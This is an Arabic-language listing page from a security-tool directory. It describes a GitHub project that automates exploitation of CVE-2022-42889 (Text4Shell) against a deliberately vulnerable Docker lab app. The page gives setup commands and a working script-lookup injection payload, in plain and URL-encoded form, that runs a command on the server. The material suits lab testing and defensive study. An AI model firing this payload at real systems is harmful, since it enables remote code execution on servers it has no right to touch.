Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Text4shell--Automated-exploit---CVE-2022-42889 — استغلال آلي لـ CVE-2022-42889 (Text4Shell) مع تطبيق Dockerized ضعيف للاختبار وإرشادات الاستغلال اليدوي. | Kitploit
أدوات/GitHubGitHub/adarshpv9746/text4shell--automated-exploit---cve-2022-42889
التحليل الديناميكي (عزل)تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubadarshpv9746/text4shell--automated-exploit---cve-2022-42889

Text4shell--Automated-exploit---CVE-2022-42889

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

استغلال آلي لـ CVE-2022-42889 (Text4Shell) مع تطبيق Dockerized ضعيف للاختبار وإرشادات الاستغلال اليدوي.

عرض المستودع
19منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

تثبيت Maven - maven-linux


// للاختراق الآلي:

  1. ./install.sh
2. `./exploit.sh`
  1. لإزالة التطبيق استخدم ./stopapp.sh

// للاختراق اليدوي:

  1. تثبيت Maven لإنشاء الجرة السميكة (fat jar)
mvn clean install
  1. بناء Docker
docker build --tag=text4shell .
  1. تشغيل Docker
docker run -p 80:8080 text4shell
  1. اختبار التطبيق
http://localhost/text4shell/attack?search=<anything>
  1. يمكن تنفيذ الهجوم بإرسال سلسلة "${prefix:name}" حيث البادئة هي lookup المذكور أعلاه:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. يمكنك أيضًا تجربة البادئات dns أو url.

  2. الحصول على معرف الحاوية

docker container ls
  1. الدخول إلى التطبيق
docker exec -it <container_id> bash
  1. للتحقق من نجاح RCE أعلاه (يجب أن ترى ملفًا باسم foo تم إنشاؤه في دليل /tmp):
ls /tmp/
  1. إيقاف الحاوية
docker container stop <container_id>
تنزيل الأداة